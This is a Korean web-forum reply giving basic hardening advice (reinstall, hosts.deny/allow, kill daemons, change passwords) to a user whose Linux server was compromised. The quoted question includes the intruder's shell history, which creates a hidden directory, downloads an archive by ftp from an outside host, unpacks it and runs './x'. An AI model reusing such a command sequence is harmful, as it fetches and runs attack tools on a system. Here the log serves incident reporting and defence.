>> Edit article
이름
제목
패스워드
이미 무언가 설치하였다면.... 시스템을 다시 설치하시는 것이 좋겠네요. 리눅 다시 셋팅하시자 마자, 일단 /etc/hosts.deny, /etc/hosts.allow 화일을 설정하시고요. (본인만 접속할 수 있게...) 그리고 여기 저기 보안에 관한 문서들 많잖아요. 그거 보면서 포트 정리나 명령어 정리 하시고요. 쓸데없는 데몬들 다 죽이시고.. 가장 중요한 것은 암호를 때때로 바꾸어 주는 것이죠. 그럼 수고하세요. : 지난번 갑자기 로그인이 되지 않아서 질문을 올렸던 사람 입니다. : : 거의 해킹이 확실한것 같아 다시 설치 했습니다. : : 설치하고 하루동안 세팅하고 그냥 방치?? 한것이 저의 잘못이라면..... : : 오늘 아침 다시보니 누군가 접근한 흔적이 있었습니다. : 새로운 사용자가 추가 되었구요.. : Named와 cgi라는 id로요... : uid값도 이상했습니다. : : 일단 사용자 계정을 삭제 했습니다. : Named라는 사용자는 쉘을 쓸수 없게 했더군요.. : : 아래는 cgi라는 사용자가 썻던 명령어 입니다. : .bash_history파일에 있던 내용 입니다. : : w : cd ... : mkdir ... : cd ... : ftp ftp.geocities.com : tar xvf out.tar.gz : cd out : ./x 24 30 : : 위에 ftp서버는 Yahoo에서 운영하는것 같았습니다. : 뭔가 다운 받아 설치하고 간것 같아요.. : : 참고로 내임서버가 이상해진것 같습니다. : 콘솔에 메시지를 뿌려대는것이.... 음... : : 도와주세요.. : 보안에 대해서는 아무런 지식이 없어서.. : 다른 로그파일은 없나요?? 있다면 어디에.. 글구 이사람 찾아서 꼭 혼내주고 싶어요.. : : -- : 안개는 하늘을 사랑합니다. -- 영원히 -- : : 사랑이 온세상에 퍼지도록...--공유하는 정보가 가치를 창출한다.
Copyleft
1999-2026 by
JSBoard Open Project
Theme Designed by
IDOO
All right reserved